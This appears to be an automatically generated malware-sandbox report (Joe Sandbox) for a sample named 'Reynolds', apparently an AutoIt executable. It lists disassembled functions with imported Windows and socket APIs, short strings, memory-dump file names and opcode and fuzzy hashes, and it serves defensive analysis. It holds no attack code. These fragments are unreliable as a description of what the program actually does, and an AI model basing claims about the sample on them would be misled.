                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: f$p
                                                                                                      • API String ID: 3215553584-1290815066
                                                                                                      • Opcode ID: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
                                                                                                      • Instruction ID: 4f8be7e143e6660ed587b896e8588123623352b7d1a2c328767a91f3d71ef431
                                                                                                      • Opcode Fuzzy Hash: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
                                                                                                      • Instruction Fuzzy Hash: D7122722E0E153E5FB22BB14F004279FA75EB50754FC94279D69C07AE8DB3DE5828B20
                                                                                                      Function 00007FF7AA15B314 Relevance: 9.2, APIs: 6, Instructions: 193COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • #8.OLEAUT32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B329
                                                                                                      • #9.WSOCK32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B3AE
                                                                                                      • #10.WSOCK32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B3BA
                                                                                                      • #9.WSOCK32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B3C5
                                                                                                      • #2.WSOCK32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B3F5
                                                                                                      • #10.WSOCK32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B457
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                                                                                                      • Instruction ID: 767c18689da8dfb8cbe4ad1465a1b308a2573f79c98da3cd221fc0ef75fee82a
                                                                                                      • Opcode Fuzzy Hash: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                                                                                                      • Instruction Fuzzy Hash: B9714E31A1E243E2FE2ABF29E19407CA371EF45780F864175D64A077B1EE2CE9568720
                                                                                                      Function 00007FF7AA100350 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                      • API String ID: 0-2263619337
                                                                                                      • Opcode ID: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                                                                                                      • Instruction ID: dbb5be826cb3d5916e2cb38a05499e6253111ae792f3d6c6189f43731c0f7c55
                                                                                                      • Opcode Fuzzy Hash: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                                                                                                      • Instruction Fuzzy Hash: 9051D672F0AA02D6FB12EB68E0401BDB375EB81B84F968175DA0E077A5DE39D543C350
                                                                                                      Function 000002453CA256A0 Relevance: 9.1, APIs: 6, Instructions: 116COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$___mb_cur_max_funcfreemallocwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2983283001-0
                                                                                                      • Opcode ID: 310b7c8f0d1ffc8152b8f5f88d34d6eeceacff066d323edff3efd4d90646da0a
                                                                                                      • Instruction ID: 7c53e4e8e19077f3cc9bea3e26bcf54620a64f4b2ee73879660b848f41ecee62
                                                                                                      • Opcode Fuzzy Hash: 310b7c8f0d1ffc8152b8f5f88d34d6eeceacff066d323edff3efd4d90646da0a
                                                                                                      • Instruction Fuzzy Hash: F941E223218AA087E326DF65A41836EBFA0F795BC4F448165EEC603BD6EE79C4C5C740
                                                                                                      Function 00007FF7AA0F1B30 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                      • String ID:
                                                                                                      • API String ID: 2592858361-0
                                                                                                      • Opcode ID: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                                                                                                      • Instruction ID: a334c045e53bc72b1c75d1c2594f9fedc54e01ea36f9e3721b0b4f2f72bf80b7
                                                                                                      • Opcode Fuzzy Hash: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                                                                                                      • Instruction Fuzzy Hash: D4519B72A0A682D6F621EB11E48437AB7B0FB55B94F820175CA5D07BA5EF7DE402C720
                                                                                                      Function 00007FF7AA121D04 Relevance: 9.1, APIs: 6, Instructions: 56threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2082702847-0
                                                                                                      • Opcode ID: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
                                                                                                      • Instruction ID: 5138de2ad193fa22c477b26d322844f0e6d966c7445a6bb0cc2b9d8bc5c63f71
                                                                                                      • Opcode Fuzzy Hash: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
                                                                                                      • Instruction Fuzzy Hash: D1213C75A0B646E1FE16EB61F408279A2B0AF447B4F960774DA2D066E5DE3CE40A8320
                                                                                                      Function 00007FF7AA15BD00 Relevance: 9.1, APIs: 6, Instructions: 56stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 450394209-0
                                                                                                      • Opcode ID: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                                                                                                      • Instruction ID: fb33bad28bcccfd6f04924ca04e8bf89d9dd329a3e7e8cd58669992d0483d759
                                                                                                      • Opcode Fuzzy Hash: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                                                                                                      • Instruction Fuzzy Hash: 4D119036B0D682D7FB55AB15F44032AA3B1AB84B88F994070DA4D4BA28DF3DD4828B10
                                                                                                      Function 000002453CA22B74 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                                      • String ID:
                                                                                                      • API String ID: 3326252324-0
                                                                                                      • Opcode ID: 046c686a04437311f08e48af213c3933ddadf9326a8618350c892433254c2136
                                                                                                      • Instruction ID: e763b80d5e7b0abef8a323fe110f95e1c4eef307f8dc3a886e5c54c3267412c1
                                                                                                      • Opcode Fuzzy Hash: 046c686a04437311f08e48af213c3933ddadf9326a8618350c892433254c2136
                                                                                                      • Instruction Fuzzy Hash: 4F21CC33601E3883FA579F51FA5C3642A61B754FE0F5406D1C9DA8BAA7DF28E8C68300
                                                                                                      Function 00007FF7AA162828 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDevice$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 1035833867-0
                                                                                                      • Opcode ID: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                                                                                                      • Instruction ID: 168615ca83f69ee19ff521eb6a9728083bc0357878b3f3358de01cb0a5d160b0
                                                                                                      • Opcode Fuzzy Hash: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                                                                                                      • Instruction Fuzzy Hash: F5119175B0AB11D2FB09DB61E444029A6B5FB88BD4B868078CE0E47B64DE3DD8028710
                                                                                                      Function 00007FF7AA1A117C Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                      • String ID:
                                                                                                      • API String ID: 43455801-0
                                                                                                      • Opcode ID: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                                                                                                      • Instruction ID: e5ebf5a0aaa901c1181cc5a49926c81b362a812ac20364ae4d8b25486a9c530d
                                                                                                      • Opcode Fuzzy Hash: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                                                                                                      • Instruction Fuzzy Hash: 9411BF32B19292E2F715AB15F804779A770EB85BA8F994175CF0603B60CF7DE44AC740
                                                                                                      Function 00007FF7AA0F4050 Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4278518827-0
                                                                                                      • Opcode ID: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                                                                                                      • Instruction ID: 1ed8782babb00ef6e56afe94467e61ec9ff550546acf48e8a32e545a71196d4e
                                                                                                      • Opcode Fuzzy Hash: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                                                                                                      • Instruction Fuzzy Hash: 4211527291A640CAE349DF39DC881197BB2FB58B18B958478C24987276DF39D49BC710
                                                                                                      Function 00007FF7AA1298C8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: #$E$O
                                                                                                      • API String ID: 3215553584-248080428
                                                                                                      • Opcode ID: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                      • Instruction ID: 98c492422269c85ee0aeb6f6103e1d8876c861469ec8406493fd5fca318d9f42
                                                                                                      • Opcode Fuzzy Hash: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                      • Instruction Fuzzy Hash: 2841A322A1A751D5FF52AB25E8402BDA3B0FF54798B894075EE4D07768EF3ED44AC320
                                                                                                      Function 000002453CA23ED6 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _errnomemset
                                                                                                      • String ID: P
                                                                                                      • API String ID: 3043901106-3110715001
                                                                                                      • Opcode ID: 4d236f57323baabecf70d0d1eca7d34f820cb77df5c0eb23e4659be4acd931ba
                                                                                                      • Instruction ID: 74d24377c2b1fbcdb99d1dece966251a074564c6676563314f4f90519c56b71c
                                                                                                      • Opcode Fuzzy Hash: 4d236f57323baabecf70d0d1eca7d34f820cb77df5c0eb23e4659be4acd931ba
                                                                                                      • Instruction Fuzzy Hash: AE51B373208AE487E7738F28E4493EABBA0F785B94F045151CFDA57A96CB38C4C58B00
                                                                                                      Function 000002453CA29156 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$fputwc
                                                                                                      • String ID: o$o
                                                                                                      • API String ID: 3923445609-2419050592
                                                                                                      • Opcode ID: 0e953a1d3deaba2e067c36e90a26b97d2f55abf671cbae7c9199f28f6f0a85d3
                                                                                                      • Instruction ID: 115d5d2b0bcc884fc4ec135d838ee2e12fefe5ff0dee0f4643f1001d04b4a523
                                                                                                      • Opcode Fuzzy Hash: 0e953a1d3deaba2e067c36e90a26b97d2f55abf671cbae7c9199f28f6f0a85d3
                                                                                                      • Instruction Fuzzy Hash: 3041C363A08AB147F77B8E3A925C36A7E92A715BE4F109150CFE766AD3D235D8D1C300
                                                                                                      Function 00007FF7AA0F5648 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                      • String ID: Line %d: $AutoIt -
                                                                                                      • API String ID: 3135491444-4094128768
                                                                                                      • Opcode ID: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                                                                                                      • Instruction ID: 8f933acc322544a284c8314785f127897646c40fdb41f3337a9075740dd06a06
                                                                                                      • Opcode Fuzzy Hash: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                                                                                                      • Instruction Fuzzy Hash: EC415322A0E647E6F751FB20E4801BEA361FB95344FC14075E64D475BAEF2CE61AC760
                                                                                                      Function 00007FF7AA199C5C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                      • String ID: SysAnimate32
                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                      • Opcode ID: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                                                                                                      • Instruction ID: c1fe1953de77a287e7e00766e0b3a47b31a4aa1a9866036b4850a6354572668d
                                                                                                      • Opcode Fuzzy Hash: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                                                                                                      • Instruction Fuzzy Hash: 7C31A07260A6C1DAE761AF20E440B6EB7B1FB85790F914139DA5D07BA4DF3DD442CB10
                                                                                                      Function 00007FF7AA118FF4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
